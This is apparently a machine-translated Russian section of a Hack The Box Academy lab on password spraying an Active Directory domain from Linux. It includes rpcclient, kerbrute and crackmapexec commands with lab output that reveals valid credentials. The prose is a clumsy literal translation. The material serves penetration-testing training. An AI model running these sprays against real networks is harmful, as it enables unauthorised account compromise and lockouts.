Теперь, когда мы создали список слов, используя один из методов, описанных в предыдущих разделах, пришло время выполнить нашу атаку. В следующих разделах мы попрактикуемся в подборе паролей с хостов Linux и Windows. Это ключевой момент для нас, поскольку это один из двух основных способов получения учетных данных домена для доступа, но мы также должны действовать осторожно.
После того, как мы создали список слов, используя один из методов, показанных в предыдущем разделе, пришло время выполнить атаку. Rpcclient
это отличный вариант для выполнения этой атаки из Linux. Важным соображением является то, что действительный логин не сразу виден с помощью rpcclient
ответа Authority Name
, указывающего на успешный вход в систему. Мы можем отфильтровывать недействительные попытки входа с помощью grepping
for Authority
в ответе. Для выполнения атаки можно использовать следующую однострочную версию Bash (адаптированную здесь).
Внутреннее напыление паролей - из Linux
for u in$(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Давайте попробуем это в целевой среде.
Внутреннее напыление паролей - из Linux
r00towl@htb[/htb]$ for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Account Name: tjohnson, Authority Name: INLANEFREIGHT
Account Name: sgage, Authority Name: INLANEFREIGHT
Мы также можем использовать Kerbrute
для той же атаки, что обсуждалась ранее.
Внутреннее напыление паролей - из Linux
r00towl@htb[/htb]$ kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1 __ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\\___/_/ /_.___/_/ \\__,_/\\__/\\___/
Version: dev (9cfb81e) - 02/17/22 - Ronnie Flathers @ropnop
2022/02/17 22:57:12 > Using KDC(s):
2022/02/17 22:57:12 > 172.16.5.5:88
2022/02/17 22:57:12 > [+] VALID LOGIN: [email protected]:Welcome1
2022/02/17 22:57:12 > Done! Tested 57 logins (1 successes) in 0.172 seconds
Существует множество других методов для выполнения ввода пароля в Linux. Еще один отличный вариант - использование CrackMapExec
. Универсальный инструмент принимает текстовый файл с именами пользователей для запуска с использованием одного пароля в ходе точечной атаки. Здесь мы используем grep для +
, чтобы отфильтровывать сбои при входе в систему и оттачивать только допустимые попытки входа в систему, чтобы убедиться, что мы ничего не пропустим, прокручивая множество строк вывода.
Внутреннее напыление паролей - из Linux
r00towl@htb[/htb]$ sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\\avazquez:Password123